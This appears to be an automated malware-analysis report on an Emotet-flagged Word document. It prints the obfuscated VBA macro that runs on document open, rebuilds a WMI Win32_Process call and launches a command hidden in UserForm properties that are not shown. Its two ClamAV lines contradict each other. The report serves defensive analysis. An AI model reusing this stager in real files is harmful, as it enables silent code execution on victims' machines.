Verdict: MALICIOUS
Risk Score: 232

Heuristics (8)

- ClamAV: Doc.Downloader.Emotet-7578627-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Emotet-7578627-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings). Document contains VBA macro code.
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER). VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive. Matched line in script: `u1 = Split(Kkfplkpdvk, "}{")`
- CreateObject call (high, OLE_VBA_CREATEOBJ). CreateObject call. Matched line in script: `Set Fouvjqnljmee = CreateObject(Hrtzqswxcsfy)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Document_Open macro. Matched line in script: `Private Sub Document_open()`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35771 bytes |

SHA-256: 8e782a5c285b2ffce1b265cec85e76da6d575440f5163f0321d42eeaf09b9eec

Detection

- ClamAV: No threats found
- Obfuscation or payload: likely. 51 of 141 identifiers look randomly generated (e.g. '_B_var_XexyrdwzaXwkntulzzygb'); 13 string-concatenation chain(s); consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script

Attribute VB_Name = "Cfuiaiztoqz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Plhwacjwcanq.Yevzwodkmibrd
End Sub
Attribute VB_Name = "Bwqriffjx"
Attribute VB_Base = "0{A4AFFB55-D7EA-4584-A722-8E7D4792185C}{3FDB909B-C704-4B4F-AD73-9976E97204D0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Kgukvnenpz"
Attribute VB_Base = "0{469CF7AD-9D26-495E-A7BF-4DCD6F807978}{DB09AC86-2C75-46A0-8368-D66F51243C75}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Kgdjogqkccwe()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Nbljjanajsysd"
Attribute VB_Base = "0{CD92AB08-7E3C-41EF-9AE3-AA3963C9E1FC}{DCCF0A3E-9438-4203-BA96-F2922FE93E9B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Kkfiojdgeiy()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Jikpkxzdb"
Attribute VB_Base = "0{1D5BE932-1369-489E-A072-4CA2FD8DC35D}{590FB518-8999-4B52-A843-B76616AD67F5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Jgjxkkwdutr()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Wmokvgbkwir"
Attribute VB_Base = "0{953C44F6-B54F-4939-B973-768284C2E7EA}{927FC815-BAD8-4CD3-A122-46391A7FD87A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Ihfvnifoy()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Gvumujkrqttyi"
Attribute VB_Base = "0{02FEFE92-BE4D-44CC-8948-6732BDCB7FDB}{D3A7806B-5146-4EEC-8CD1-438E6F5C4B01}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Uefnxrvcb()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Zgimbxepezlpq"
Attribute VB_Base = "0{510B1DB5-652C-48CE-AF04-F9FE1BFAB0F3}{816DD689-C0CC-46D3-813F-4D333F7E059B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Zkopjwfeobjlk()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Ttxwkdjerv"
Attribute VB_Base = "0{B9D90002-8C97-4875-A7EC-03EC9DF7BE0D}{34BD8F21-BBC2-4EDF-B4FD-D316D87E0301}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Liippbzslnle()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Buksmthugsrt"
Attribute VB_Base = "0{A4735D7E-DE70-4046-BA9F-D0F62B27C757}{8C539699-45FA-4005-BD0F-AD200E631070}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Qgxtpduwfmuk()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Zfhsvqcotzj"
Attribute VB_Base = "0{06D1EFE3-2B11-4EAA-9620-CD3EE7B26A06}{37F6EC9F-4569-49CA-BEBA-D0BA4D6FA04D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Rcqxwzfbeq()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Xyfpyycirva"
Attribute VB_Base = "0{956B5434-1EA8-4940-8ABA-D9752F560114}{19675174-5B81-4731-8F57-B6DC8703A3B2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Xkrcmykordtoo()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Fouppdyrwz"
Attribute VB_Base = "0{13544953-6023-49C6-9767-E3CC8E7B17D9}{3815A20E-081A-45A6-8C07-33AC843188B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Hsuvcgzz()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Plhwacjwcanq"
Function Yevzwodkmibrd()
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Iiceghagwbe = "}{}{w}{i}{}{n}{m}{g}{}{mt}{}{" + ChrW(Bwqriffjx.Zoom + 9 + 6) + ":}{wi}{}{n3}{}{}{2}{}{_}{}{" + Bwqriffjx.Mwkfvbdop + "r}{}{o}{ce}{s}{}{s}{"
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Hrtzqswxcsfy = Fgbyqiakdf(Iiceghagwbe)
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Set Fouvjqnljmee = CreateObject(Hrtzqswxcsfy)
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Msyoacrf = Bwqriffjx.Xfqbuvcmyh.Tag
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Obvbulmydmoud = Hrtzqswxcsfy + ChrW(Bwqriffjx.Zoom + 9 + 6) + Bwqriffjx.Rxpzskxtee.Tag + Msyoacrf
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Smgecjzgqq = Obvbulmydmoud + Bwqriffjx.Mwkfvbdop
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Set Hmpvkijz = Pqazhnhcsgxj(Smgecjzgqq)
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Call Fouvjqnljmee. _
Create(Cfuiaiztoqz.NoLineBreakAfter + Stostkqdsrlw + qw2, Mwtzcrln, Hmpvkijz)
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
End Function
Function Pqazhnhcsgxj(Ucriqjthagyc)
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Set Pqazhnhcsgxj = CreateObject(Ucriqjthagyc)
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Pqazhnhcsgxj. _
showwindow = Nuhtfmvmfinx + Mugffvfg
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
End Function
Function Fgbyqiakdf(Kkfplkpdvk)
u1 = Split(Kkfplkpdvk, "}{")
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Fgbyqiakdf = Join(u1, NoLineBreakAfter)
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
End Function
Function Stostkqdsrlw()
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
e1 = Bwqriffjx.Yoqvrpkfguxrq.Pages(0).Caption
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Stostkqdsrlw = Fgbyqiakdf(e1)
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
End Function